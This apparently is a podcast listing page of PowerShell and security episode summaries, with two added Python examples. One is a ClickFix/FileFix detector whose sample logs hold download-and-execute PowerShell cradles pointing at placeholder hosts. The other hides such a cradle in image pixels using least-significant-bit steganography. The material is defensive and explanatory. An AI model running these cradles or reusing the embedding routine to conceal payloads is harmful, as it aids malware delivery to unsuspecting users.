Cross-platform command-line interface and scripting language for system and network administration
Newly minted Microsoft MVP Stephen Valdinger, known as Steviecoaster, joins The PowerShell Podcast to share his journey from IT admin to community mentor and automation advocate. He talks about discovering PowerShell through Exchange, the career-changing power of automation, and his work with AutomatedLab, PowerShell Universal, and WinUI Shell. Stevie also highlights the importance of mentoring, building community, and making PowerShell approachable for everyone. Key Takeaways: PowerShell as a gateway: Learning PowerShell can unlock career growth, lead to better automation, and even spark new opportunities like blogging, mentoring, and conference speaking. Tools for learning and labs: AutomatedLab, paired with Stevie's utilities and GUI work, provides a powerful way to build test environments and gain hands-on experience. Community and mentorship matter: Sharing knowledge, mentoring beginners, and creating approachable tools not only help others grow but also strengthen your own skills. Guest Bio: Steven Valdinger (Steviecoaster) is a Microsoft MVP, Customer Success Manager at Chocolatey, and community leader with a passion for automation and mentoring. With years of experience in IT, Stevie has become known for his approachable teaching style, and his contributions to open source. He is also a frequent contributor to community discussions, blogs at steviecoaster.dev, and presents at events like PowerShell Wednesdays and PowerShell Summit. 
Resource Links: Steviecoaster's Blog: https://steviecoaster.dev Steviecoaster on BlueSky: https://bsky.app/profile/steviecoaster.dev Steviecoaster on GitHub: https://github.com/steviecoaster Connect with Andrew: https://andrewpla.tech/links Stevie's AutomatedLab UI: https://github.com/steviecoaster/PowerShellUniversal.Apps.AutomatedLab AutomatedLab: https://github.com/AutomatedLab/AutomatedLab PowerShell Universal (by Ironman Software): https://ironmansoftware.com/powershell-universal WinUI Shell: https://github.com/mdgrs1/WinUI-Shell PDQ Discord: https://discord.gg/PDQ Stevie's PowerShell Wednesday WinUIShell talk: https://www.youtube.com/watch?v=PE1hy0VZXes&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&index=5 The PowerShell Podcast on YouTube: https://youtu.be/iKYfZBakoBI The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast
CISA furloughs most of its workforce due to the government shutdown. The U.S. Air Force confirms it is investigating a SharePoint-related breach. Google warns of a large-scale extortion campaign targeting executives. Researchers uncover Android spyware campaigns disguised as popular messaging apps. An extortion group claims to have breached Red Hat's private GitHub repositories. A software provider for recreational vehicle and power sport dealers suffers a ransomware breach. Patchwork APT deploys a new PowerShell loader that uses scheduled tasks for persistence. A Tennessee Senator urges aggressive U.S. action to prepare for a post-quantum future. A Malaysian man pleads guilty to supporting a massive crypto fraud. Protected health info is not a marketing tool. CyberWire Guest: Cynthia Kaiser, SVP of Halcyon's Ransomware Research Center and former Deputy Assistant Director at the FBI's Cyber Division, joins us with insights on the government shutdown.
Selected Reading: Shutdown guts U.S. cybersecurity agency at perilous time (CISA); Air Force admits SharePoint privacy issue; reports of breach (The Register); Google warns executives are being targeted for extortion with leaked Oracle data (IT Pro); Researchers uncover spyware targeting messaging app users in the UAE (The Record); Red Hat confirms security incident after hackers claim GitHub breach (Bleeping Computer); 766,000 Impacted by Data Breach at Dealership Software Provider Motility (Security Week); Patchwork APT: Leveraging PowerShell to Create Scheduled Tasks and Deploy Final Payload (GB Hackers); GOP senator confirms pending White House quantum push, touts legislative alternatives (CyberScoop); Bitcoin Fixer Convicted for Role in Money Laundering Scheme (Bank Infosecurity); Nursing Home Fined $182K for Posting Patient Photos Online (Bank Infosecurity). The CyberWire is a production of N2K Networks.
Thomas Rayner joins The PowerShell Podcast to share his journey from sysadmin and PowerShell MVP to securing Microsoft 365 as a security professional at Microsoft. He reflects on how PowerShell accelerated his career, the importance of blogging and community involvement, and why clear communication with managers is vital for growth. Thomas also offers advice for beginners, highlighting patience, persistence, and the value of mentorship in tech. Key Takeaways: PowerShell as a force multiplier: Automating repetitive tasks with PowerShell helped Thomas advance his career and opened the door to opportunities at Microsoft. Career growth requires communication: Being candid with managers, demonstrating value, and asking for resources to learn are key to advancement. Community and mentorship matter: Involvement in the PowerShell community, saying yes to opportunities, and supporting peers can transform both careers and personal growth. Guest Bio: Thomas Rayner is a security professional at Microsoft, where he focuses on preventative security solutions in Microsoft 365. A former Microsoft MVP in Cloud and Datacenter Management, Thomas built his career by blogging, speaking, and contributing to the PowerShell community. Originally from Edmonton, Canada, he used PowerShell to accelerate his early career as a sysadmin before moving into security roles at Microsoft. Today, he continues to share career wisdom, mentor others, and advocate for growth mindset thinking in tech. Resource Links: Thomas Rayner's Blog: https://thomasrayner.ca Thomas Rayner on LinkedIn: https://www.linkedin.com/in/thomasrayner/ Thomas Rayner on GitHub: https://github.com/tlrayner Connect with Andrew: https://andrewpla.tech/links PDQ Discord: https://discord.gg/PDQ The PowerShell Podcast on YouTube: https://youtu.be/3H-tMKqlSOs The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
In this episode of The #SOCBrief, we break down the rising FileFix attack, a new social engineering technique using steganography to deliver info-stealing malware. Learn how attackers disguise malicious PowerShell commands, the risks this poses for browsers, messengers, and crypto wallets, and the proactive defenses SOCs can use to detect and contain these threats before they escalate into larger breaches. Watch full episodes at youtube.com/@aliascybersecurity. Listen on Apple Podcasts, Spotify and anywhere you get your podcasts.
Patrick Meinecke, known as SeeminglyScience, joins host Andrew Pla to share his journey from sysadmin to joining the PowerShell team at Microsoft. He discusses his early community contributions, the inner workings of the PowerShell engine, and powerful but underused features like ETS and type converters. Patrick also highlights helpful modules such as PowerShell Run, ctypes, and Useful Argument Completers, while reflecting on the importance of community engagement and open source collaboration. Key Takeaways: From community to Microsoft: Patrick's contributions to PowerShell Editor Services and GitHub repos helped pave the way for his role on the official PowerShell team. Hidden gems in PowerShell: Features like the Extendable Type System (ETS), type converters, and modules such as PowerShell Run, ctypes, and Useful Argument Completers unlock powerful possibilities. Community makes it stronger: Helping others, answering questions, and sharing knowledge not only grows the ecosystem but also helps contributors sharpen their own skills. Guest Bio: Patrick Meinecke, widely known as SeeminglyScience, is a software engineer on the PowerShell team at Microsoft. Before joining the team, he spent over 15 years in sysadmin and tech support roles and is a longstanding contributor to the PowerShell open-source community. Patrick is recognized for his deep technical expertise in the PowerShell engine, his contributions to PowerShell Editor Services, and his passion for solving complex problems. He remains an active community member, often engaging on Discord and GitHub to help others learn and grow. 
Resource Links: Patrick Meinecke on GitHub (@SeeminglyScience): https://github.com/SeeminglyScience Connect with Andrew: https://andrewpla.tech/links PowerShell Run (module by MDGRS): https://github.com/nbgrs/PowerShellRun Useful Argument Completers (module by MartinGC94): https://github.com/MartinGC94/UsefulArgumentCompleters ctypes (module by Jordan Borean): https://github.com/jborean93/PSctypes Spectre.Console for PowerShell (community project): https://github.com/PoshCode/PSSpectreConsole Join the PDQ Discord: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/Zyj1IdZFf1E The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
Today we are joined by Nati Tal, Head of Guardio Labs, discussing their work “CAPTCHAgeddon” or unmasking the viral evolution of the ClickFix browser-based threat. CAPTCHAgeddon — Shaked Chen's deep dive into the ClickFix fake-captcha wave — reveals how a red-team trick morphed into a dominant, download-free browser threat that tricks users into pasting clipboard PowerShell/shell commands and leverages trusted infrastructure, including Google Scripts. Guardio's DBSCAN-based payload clustering exposes distinct attacker toolkits and distribution paths — from malvertising and compromised WordPress to social posts and Git repos — and argues defenders need behavioral, intelligence-driven protections, not just signatures. The research can be found here: “CAPTCHAgeddon” Unmasking the Viral Evolution of the ClickFix Browser-Based Threat Learn more about your ad choices. Visit megaphone.fm/adchoices
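Both the FileFix episode and the CAPTCHAgeddon research above describe the same last step: the victim pastes a clipboard command into the Win+R dialog or the File Explorer address bar, so the interpreter is launched by explorer.exe with a download-and-execute cradle on its command line. The following Python triage routine, an added example that is not code from Guardio, Alias Cybersecurity or either podcast, scores process-creation records for that pattern. Field names mimic Sysmon Event ID 1 (ParentImage, Image, CommandLine); the four sample records, the heuristic weights and the threshold are constructed assumptions, not anything the research specifies.

```python
"""Triage of ClickFix / FileFix paste-to-run launches in process telemetry.

Added example; not code from the cited research or the podcasts. Both lures
end with the victim pasting a command into the Win+R dialog or the File
Explorer address bar, so the interpreter is a child of explorer.exe and its
command line carries a download-and-execute cradle. Field names mimic
Sysmon Event ID 1; records, weights and threshold are constructed assumptions.
"""
from __future__ import annotations

import base64
import re

# Interpreters the lure text asks the victim to paste into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (pattern over the lower-cased command line plus decoded payload, label)
CRADLE_PATTERNS = [
    (r"\biex\b|invoke-expression", "invoke-expression"),
    (r"\birm\b|invoke-restmethod|invoke-webrequest|downloadstring", "web download"),
    (r"-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden window"),
    (r"-e(?:nc|ncodedcommand|c)?\s+[a-z0-9+/=]{20,}", "encoded command"),
    (r"mshta(?:\.exe)?\s+https?://", "mshta remote script"),
]

# FileFix: the pasted line ends in a comment shaped like a path, so the
# address bar shows the victim only the fake file name.
FAKE_PATH_COMMENT = re.compile(r"#\s*[A-Za-z]:\\\S*\s*$")
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Score one process-creation record; higher means more ClickFix-like."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    # Inspect the decoded -EncodedCommand payload alongside the raw line.
    text = (cmdline + " " + decode_encoded_command(cmdline)).lower()

    score, reasons = 0, []
    if image in INTERPRETERS and parent == "explorer.exe":
        score += 2
        reasons.append("interpreter spawned by explorer.exe (Win+R or address bar)")
    for pattern, label in CRADLE_PATTERNS:
        if re.search(pattern, text):
            score += 1
            reasons.append(label)
    if FAKE_PATH_COMMENT.search(cmdline):
        score += 2
        reasons.append("trailing fake-path comment (FileFix)")
    return score, reasons


def find_clickfix(events: list[dict], threshold: int = 3) -> list[dict]:
    """Return records at or above threshold, annotated with score and reasons."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({**event, "score": score, "reasons": reasons})
    return hits


# Constructed telemetry, not real captures.
SAMPLE_EVENTS = [
    {   # ClickFix: fake CAPTCHA tells the user to press Win+R and paste
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (irm https://captcha.example/verify)"',
    },
    {   # FileFix: pasted into the Explorer address bar with a fake path comment
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -c "iex (irm https://share.example/x)"        # C:\\Users\\Public\\Report.pdf',
    },
    {   # encoded variant; payload is base64(UTF-16LE) of a download cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": "pwsh -nop -enc " + base64.b64encode(
            "iex (irm https://captcha.example/p)".encode("utf-16-le")).decode(),
    },
    {   # benign: an admin runs a script from a terminal
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\Ops\Rotate-Certs.ps1",
    },
]

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"], hit["CommandLine"][:60])
```

The parent-process weight does the heavy lifting: a download cradle in a terminal session is noisy but common, whereas an interpreter spawned by explorer.exe with a cradle is what the paste step leaves behind. Decoding -EncodedCommand before matching is what keeps the third record from scoring as benign; in production you would add the same treatment for cmd /c echo piping and for the mshta and msiexec variants the research documents.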
Michael Niehaus, an IT and software development veteran with quite a long history at Microsoft, talks about his career from his early days as a mainframe system programmer to his deep involvement with Microsoft products. He describes how he moved from programming in assembly language to IT roles involving client-server models in the early days of personal computing in the 1990s. This ultimately led to his work with Microsoft's Systems Management Server (SMS) and the Business Desktop Deployment Solution Accelerator, the latter of which evolved into the Microsoft Deployment Toolkit (MDT). A significant focus of this episode is the development and evolution of deployment tools and the underlying techniques, from Kickstart to VBScript to PowerShell. Michael recalls encountering PowerShell and emphasises its potential as a powerful backend for various Microsoft products in the very early days. As strange as it may sound today, the release of Vista retrospectively represented a 'giant leap' in terms of new tools, techniques and enhancements, especially for OS deployment. Michael discusses the introduction of WIM files, WinPE and AutoUnattend.xml, among other things. He reflects on the challenges and innovations involved in shifting to WIM files, and on the effectiveness of Windows PE. He highlights their significance in Microsoft's operating system deployment strategies. Turning to contemporary issues, Michael and Thorsten discuss concerns about Microsoft's Windows Update Service (WSUS) and the impending discontinuation of related technologies. Finally, Michael talks about his role at the new company 2Pint, where he works on products such as DeployR, a successor to MDT.
In this episode, host Andrew Pla welcomes back Steven Judd, Microsoft MVP, teacher, and longtime community contributor. Together, they dive into the theme of beginnings, from starting careers in IT, to first encounters with PowerShell, and the importance of resilience while navigating the “valley of despair” in learning. Steven shares his journey from music and business studies into technology, where curiosity, persistence, and a willingness to read the manuals shaped his career. The conversation also explores how community, conferences, and friendships have been essential to Steven's growth. From humorous “please clap” moments at Nano Conf to building lasting connections, Steven highlights the power of showing up authentically, persevering through challenges, and helping others along the way.Key Takeaways The Power of the Basics: Learning commands like Get-Command, Get-Help, and Get-Member (“the tripod”) forms the foundation of a strong PowerShell journey. Resilience in Learning: Navigating the “valley of despair” in tough topics like PowerShell, certificates, or regex is where growth happens. Persistence pays off. Community is Everything: From user groups to conferences, surrounding yourself with peers and mentors accelerates growth and helps combat imposter syndrome. Guest Bio Steven Judd is a Microsoft MVP, educator, and veteran PowerShell enthusiast who has been teaching and sharing knowledge in the community for many years. With a background that spans business, music, and IT, Steven brings a unique perspective on learning, resilience, and humor. 
Known for his approachable teaching style and dad jokes, Steven has helped countless professionals embrace automation, improve their skills, and find their place in the PowerShell community.Resource Links Steven Judd's Content Hub: https://shortcutyour.life Steven Judd on YouTube (PowerShell content): YouTube Search Steven Judd on X/Twitter (@StevenJudd): https://x.com/StevenJudd Steven Judd's Merch Store: https://store.stephenjudd.com PDQ Discord: https://discord.gg/PDQ Connect with Andrew: https://andrewpla.tech/links PowerShell Wednesdays (live community sessions): https://www.youtube.com/watch?v=8oesn0HgGxE&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B The PowerShell Podcast on YouTube: https://youtu.be/yu6RVPwp8KY The PowerShell Podcast hub: The PowerShell Podcast: https://pdq.com/the-powershell-podcast
HP Wolf Security research shows attackers chaining living-off-the-land techniques to exploit detection weak spots. HP Inc has issued its latest Threat Insights Report, revealing how age-old living-off-the-land (LOTL) and phishing techniques are evolving to bypass traditional detection-based security tools. LOTL techniques, where attackers use legitimate tools and features built into a computer to carry out their attacks, have long been a staple of the threat actor toolkit. However, HP threat researchers now warn that the growing use of multiple, often uncommon, binaries in a single campaign is making it even harder to distinguish malicious from legitimate activity. The report provides an analysis of real-world cyberattacks, helping organisations keep up with the latest techniques cybercriminals are using to evade detection and breach PCs in the fast-changing cybercrime landscape. Based on the millions of endpoints running HP Wolf Security, notable campaigns identified by HP threat researchers include: · Fake Adobe Reader Invoice Signals New Wave of Ultra-Polished Social Engineering Lures: Attackers embedded a reverse shell, a script that grants attackers control over a victim's device, in a small SVG image disguised as a very realistic Adobe Acrobat Reader file, complete with a fake loading bar giving the illusion of an ongoing upload, increasing the chances victims will open it and trigger an infection chain. Attackers also geofenced the download to German-speaking regions to limit exposure, hinder automated analysis systems and delay detection. · Attackers Hiding Malware in Pixel Image Files: Attackers used Microsoft Compiled HTML Help files to hide malicious code within image pixels. The files, disguised as project documents, concealed an XWorm payload in the pixel data, which was then extracted and used to execute a multi-step infection chain involving multiple LOTL techniques.
PowerShell was also used to run a CMD file that deleted evidence of files once they'd been downloaded and executed. · Resurgent Lumma Stealer Spreads via IMG Archives: Lumma Stealer was one of the most active malware families observed in Q2. Attackers distributed it through multiple channels, including IMG archive attachments that use LOTL techniques to bypass security filters and exploit trusted systems. Despite a law enforcement crackdown in May 2025, campaigns continued in June, and the group is already registering more domains and building infrastructure. Alex Holland, Principal Threat Researcher, HP Security Lab, comments: "Attackers aren't reinventing the wheel, but they are refining their techniques. Living-off-the-land, reverse shells, and phishing have been around for decades, but today's threat actors are sharpening these methods. We're seeing more chaining of living-off-the-land tools and use of less obvious file types, such as images, to evade detection. Take reverse shells as an example - you don't have to drop a fully-fledged RAT when a simple, lightweight script will achieve the same effect. It's simple, fast and often slips under the radar because it's so basic." These campaigns show how creative and adaptive threat actors have become. By hiding malicious code in images, abusing trusted system tools, and even tailoring attacks to specific regions, they're making it harder for traditional detection tools to spot threats. By isolating threats that have evaded detection tools on PCs, while still allowing malware to detonate safely inside secure containers, HP Wolf Security has specific insight into the latest techniques used by cybercriminals. To date, HP Wolf Security customers have clicked on over 55 billion email attachments, web pages, and downloaded files with no reported breaches.
The report, which examines data from April-June 2025, details how cybercriminals continue to diversify attack methods to bypass security tools that rely on detection, such as: · At least 13% of email threats ide...
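The pixel-hiding campaign above, and the steganographic FileFix delivery mentioned in the #SOCBrief episode earlier on this page, both rest on one idea: an image decodes to bytes that are indistinguishable from a normal picture until a script reads them back out. The following Python block is an added example, not HP Wolf Security's code and not the XWorm sample's encoding, which the report does not describe. It assumes the simplest scheme, one payload bit in the least-significant bit of each 8-bit channel value behind a 32-bit big-endian length prefix, and models the image as a flat list of channel values so it runs without an imaging library. The cover pixels and the stand-in cradle payload are constructed.

```python
"""Toy least-significant-bit carrier: how a payload rides inside pixel data.

Added example, not HP Wolf Security's or the XWorm sample's code. The report
says the payload was concealed in an image's pixel data and extracted at run
time but does not give the encoding; this block assumes the simplest scheme,
one payload bit per 8-bit channel value with a 32-bit big-endian length
prefix, and models the image as a flat list of channel values so it needs no
imaging library. The cover pixels and the payload below are constructed.
"""
from __future__ import annotations

import random
import struct

LENGTH_BITS = 32


def embed(pixels: list[int], payload: bytes) -> list[int]:
    """Return a copy of pixels whose LSBs carry len(payload) then payload."""
    data = struct.pack(">I", len(payload)) + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = list(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit  # overwrite only the lowest bit
    return out


def _read_bits(pixels: list[int], start: int, count: int) -> bytes:
    """Collect `count` LSBs starting at `start` into big-endian bytes."""
    value = 0
    for i in range(count):
        value = (value << 1) | (pixels[start + i] & 1)
    return value.to_bytes(count // 8, "big")


def extract(pixels: list[int]) -> bytes:
    """Recover the payload; raise if the length prefix cannot fit the carrier."""
    length = struct.unpack(">I", _read_bits(pixels, 0, LENGTH_BITS))[0]
    if LENGTH_BITS + 8 * length > len(pixels):
        raise ValueError("length prefix exceeds carrier size")
    return _read_bits(pixels, LENGTH_BITS, 8 * length)


def has_plausible_payload(pixels: list[int]) -> bool:
    """Cheap triage for this scheme: a length that fits the carrier followed
    by non-empty printable ASCII. On random cover data this is essentially
    never true; on an image produced by embed() it always is."""
    try:
        payload = extract(pixels)
    except ValueError:
        return False
    return bool(payload) and all(32 <= b < 127 for b in payload)


def max_channel_delta(a: list[int], b: list[int]) -> int:
    """Largest per-channel change between two images; LSB embedding never exceeds 1."""
    return max(abs(x - y) for x, y in zip(a, b))


# Constructed 64x64 RGB cover (flat channel list) and a stand-in cradle payload.
_rng = random.Random(1)
COVER = [_rng.randrange(256) for _ in range(64 * 64 * 3)]
PAYLOAD = b'powershell -nop -w hidden -c "iex (irm https://stage.invalid/2)"'
STEGO = embed(COVER, PAYLOAD)

if __name__ == "__main__":
    print("recovered:", extract(STEGO).decode())
    print("max channel delta:", max_channel_delta(COVER, STEGO))
```

The delta check is the defender's takeaway: every channel value moves by at most one, so the carrier renders identically and passes any image-content inspection. The detectable part is the extractor, a PowerShell or CHM-embedded script that reads pixel bytes, reassembles them and hands them to an interpreter, which is why the report frames the campaign as a chain of LOTL steps rather than a malicious file.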
I remember working at a large organization with a team of other IT Operations staffers. We rotated this one job every month amongst a few people, each taking turns, where we'd lose a day to update all the privileged passwords for our servers. This was before Managed Service Accounts and the cloud, when we were required to change these every 30 days and then store the new ones in an encrypted store. What struck me when I got stuck with this wasn't the requirement to change every 30 days; that seemed normal. The thing that bothered me was how manual this was. As a former developer, I wrote some scripts to automate this, pre-PowerShell, and make the task easier on my fellow sysadmins. I had scripts to generate a password, change it in AD, then print the password to be copied into our secure storage (no API there). This ran in a loop so I didn't lose a whole day to changing passwords. Read the rest of Password Guidance
Microsoft MVP Emanuel Palm joins The PowerShell Podcast to share his journey from managing printers in Sweden to being a Microsoft MVP who is automating the cloud with PowerShell and Azure. He talks about building the AZAuth module for OAuth authentication, using GitHub Actions for CI/CD, and the importance of blogging and community involvement. Plus, Emanuel reveals his unique side hobby... roasting coffee! Key Takeaways From printers to the cloud: Emanuel's career shows how PowerShell can open doors, from automating IT tasks to driving cloud automation and DevOps practices. Community and sharing matter: Blogging, presenting, and contributing help you grow your own understanding while creating opportunities for others. Automation and authentication: With tools like GitHub Actions and his AZAuth module, Emanuel demonstrates how to simplify workflows and securely interact with APIs. Guest Bio Emanuel Palm is a Microsoft MVP based in Sweden, where he is a consultant focused on Microsoft technologies and is active in the PowerShell community. Emanuel is the creator of the AZAuth module, a lightweight solution for handling OAuth authentication in PowerShell, and a frequent speaker at events like PowerShell Conference Europe. Beyond tech, Emanuel is a coffee enthusiast who even roasts his own beans as a side hobby. Resource Links Emanuel's Blog: https://pipe.how GitHub – Emanuel Palm: https://github.com/palmemanuel X / BlueSky: @palmemanuel AZAuth Module on GitHub: https://github.com/PalmEmanuel/AzAuth Emanuel's PS Wednesday: https://www.youtube.com/watch?v=trP2LLDynA0 Arkanum Coffee (Emanuel's hobby project): https://arkanum.coffee PDQ Discord: https://discord.gg/pdq Connect with Andrew: https://andrewpla.tech/links The PowerShell Podcast on YouTube: https://youtu.be/-uHHGVH1Kcc The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
(Disclaimer: created with Copilot) Hello dear community! In this episode, Michael & Thorsten talk about the latest developments around Microsoft Copilot, the integration of GPT-5, single sign-on on the Mac, and a few typical "Moments of Luck" from the Teams universe. There is also an outlook on the M365 Summit and new community events.
James Brundage returns to The PowerShell Podcast to talk about his new project, Turtle, which brings the classic concept of Turtle graphics into PowerShell. From simple shapes to fractals, animations, and more, James shows how PowerShell can be a powerful and fun tool for exploring programming concepts. Tune in for insights on the history of Turtle, its modern applications, and how it can inspire both new learners and seasoned pros. Guest Bio: James Brundage is a Microsoft MVP who has been heavily involved in PowerShell for over 18 years. He is a former member of the PowerShell team, working there during v2 and v3. He now works as a consultant with Start-Automating, applying his PowerShell expertise to organizations to help solve large-scale problems all around the world. He also has a lot of great projects on GitHub and regularly shares his knowledge at user groups and conferences. Resource Links: PSTurtle Project & Documentation: https://psturtle.com/ GitHub – Start-Automating: https://github.com/StartAutomating James Brundage on BlueSky (@MrPowerShell): https://bsky.app/profile/mrpowershell.com MrPowerShell.com: https://mrpowershell.com/ PowerShell Web Organization (for PowerShell + Web projects): https://github.com/PowerShellWeb Turtles in PowerShell talk: https://www.youtube.com/watch?v=o8l_bQRvMkg Follow Andrew: https://andrewpla.tech/links Join the PDQ Discord: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/oGG6bKXsdrg The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
Maxime Lamothe-Brassard, Founder and CEO of LimaCharlie, and the Defender Fridays community sit down with Jared Atkinson and dive into BloodHound. Jared is a security researcher who specializes in Digital Forensics and Incident Response. Recently, he has been building and leading private sector Hunt Operations capabilities. In his previous life, Jared led incident response missions for the U.S. Air Force Hunt Team, detecting and removing Advanced Persistent Threats on Air Force and DoD networks. Passionate about PowerShell and the open source community, Jared is the lead developer of PowerForensics and Uproot, and maintains a DFIR-focused blog at www.invoke-ir.com. On Defender Fridays we delve into the dynamic world of information security, exploring its defensive side with seasoned professionals from across the industry. Our aim is simple yet ambitious: to foster a collaborative space where ideas flow freely, experiences are shared, and knowledge expands. Join the live discussions by registering at https://limacharlie.io/defender-fridays
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Interesting Technique to Launch a Shellcode: Xavier came across malware that uses PowerShell and the CallWindowProcA() API to launch code. https://isc.sans.edu/diary/Interesting%20Technique%20to%20Launch%20a%20Shellcode/32238 NX Compromised to Steal Wallets and Credentials: The popular open source NX build package was compromised. Code was added that uses AI tools like Claude and Gemini to help steal credentials from affected systems. https://semgrep.dev/blog/2025/security-alert-nx-compromised-to-steal-wallets-and-credentials/ Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed the Global Espionage System: Several law enforcement and cybersecurity agencies worldwide collaborated to release a detailed report on the recent Salt Typhoon activity. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a
In this episode of the PowerShell Podcast, we're live from TechMentor at the Microsoft campus with two incredible guests: longtime advocate, educator, and PM on the PowerShell team at Microsoft - Jason Helmick and newcomer Troy Brown. This special episode captures the heart of community, innovation, and the transformative power of PowerShell—from seasoned insight to beginner breakthroughs. Jason drops serious knowledge on two game-changing technologies: AI Shell: Think ChatGPT, but built directly into your terminal. Learn how it enhances shell UX, assists with command building, explains parameters, and keeps you focused without switching contexts. DSC v3 (Desired State Configuration): Now fully cross-platform and decoupled from PowerShell, DSC v3 is lighter, more extensible, and suitable for everything from servers to IoT. Jason walks us through the evolution, real-world use cases (like flipping Windows from dark mode to light mode!), and what's next for the configuration platform. Highlights: Microsoft's hidden campus lore, including a piece of the Berlin Wall! 
The evolution of PSReadLine and its impact on productivity; AI Shell's support for OpenAI, Azure Copilot, Ollama, Gemini, and even custom agents; exporting configs from existing machines, a long-awaited DSC feature; why DSC v3 might be the most developer- and sysadmin-friendly release yet; the cultural backbone of the PowerShell team: being "scrappy" and driven by customer success. Troy Brown's First TechMentor Experience: First-time conference-goer Troy Brown shares his experience diving into PowerShell: how a PowerShell workshop with Sean Wheeler, Steven Judd, and Jason Helmick helped him finally understand modules; the journey from using PDQ to push basic PowerShell scripts to deeper automation potential; navigating the learning curve with community support; his message to fellow newcomers: "Don't take things personally, and embrace the journey." Resource Links: DSC v3 on GitHub; Leanpub DSC v3 Book by Gijs: https://leanpub.com/thedscv3handbook; The Phoenix Project (book, a must-read for IT pros): https://www.amazon.com/Phoenix-Project-DevOps-Helping-Business/dp/0988262592; PDQ Discord: https://discord.gg/pdq; The PowerShell Podcast on YouTube: https://youtu.be/_f5oYxzkinI; The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast
In this episode, Andrew catches up with Sean Wheeler and James Petty live from TechMentor. What starts as casual conversation about conference camaraderie turns into a rich discussion on learning PowerShell, building effective profiles, AI-assisted scripting, module recommendations, and what's next for the PowerShell Summit. Whether you're new to PowerShell or a seasoned scripter, this episode offers insights, laughs, and actionable advice. Plus, we finally settle (sort of) whether the VS Code sidebar belongs on the left or the right. Key Takeaways You don't need to learn everything. Just understand the ecosystem and build your learning map. Create your PowerShell profile now—it's an easy win with huge productivity returns. AI is a tool, not a crutch. Use it wisely and validate the results. Get involved in the community. It will accelerate your learning and broaden your opportunities. Shoutouts & Links https://powershell.org https://www.youtube.com/c/PowerShellOrg https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/hr59kahksIM
Are you tapping the power of Microsoft Graph? Richard chats with Tony Redmond about his work teaching people to leverage Microsoft Graph and all the insights it can provide about their organization. Tony views Graph as one of the key skills a sysadmin needs to manage an M365 tenant, alongside Exchange Online, SharePoint, and Teams. Throw in some Entra ID skills with Graph and you're ready to take on the rest - and there's a lot! Tony is also responsible for the excellent Office 365 for IT Pros book, now in its 12th edition for 2026. These are the fundamentals that can help you embrace the Copilot future we're all facing - and there's a lot to learn! Links: Graph PowerShell SDK; Azure Automation; Office 365 for IT Pros 2026 Edition; Maester; Agent Governance in M365; Secure Future Initiative; Linkable Identifiers in Microsoft Entra. Recorded July 24, 2025
Eric and Bob cover Raspberry Pi, Hackathon and the ARM PowerShell prizes for Explore
In this high-energy episode, returning guests Gilbert Sanchez and Jake Hildreth join Andrew for a deep dive into: Module templating with PSStucco; Building for accessibility in PowerShell; Creating open source GitHub orgs like PSInclusive; How PowerShell can lead to learning modern dev workflows like GitHub Actions and CI/CD. What begins with a conversation about a live demo gone hilariously sideways turns into an insightful exploration of how PowerShell acts as a launchpad into bigger ecosystems like GitHub, YAML, JSON, and continuous integration pipelines. Bios: Gilbert Sanchez is a Staff Software Development Engineer at Tesla, specifically working on PowerShell. Formerly known as "Señor Systems Engineer" at Meta. A loud advocate for DEI, DevEx, DevOps, and TDD. Jake Hildreth is a Principal Security Consultant at Semperis, Microsoft MVP, and longtime builder of tools that make identity security suck a little less. With nearly 25 years in IT (and the battle scars to prove it), he specializes in helping orgs secure Active Directory and survive the baroque disaster that is Active Directory Certificate Services. He's the creator of Locksmith, BlueTuxedo, and PowerPUG!, open-source tools built to make life easier for overworked identity admins. When he's not untangling Kerberos or wrangling DNS, he's usually hanging out with his favorite people and most grounding reality check: his wife and daughter. Links https://gilbertsanchez.com/posts/stucco-create-powershell-module/ https://jakehildreth.github.io/blog/2025/07/02/PowerShell-Module-Scaffolding-with-PSStucco.html https://github.com/PSInclusive https://jakehildreth.com/ https://andrewpla.tech/links https://discord.gg/pdq https://pdq.com/podcast https://youtu.be/w-z2-0ii96Y
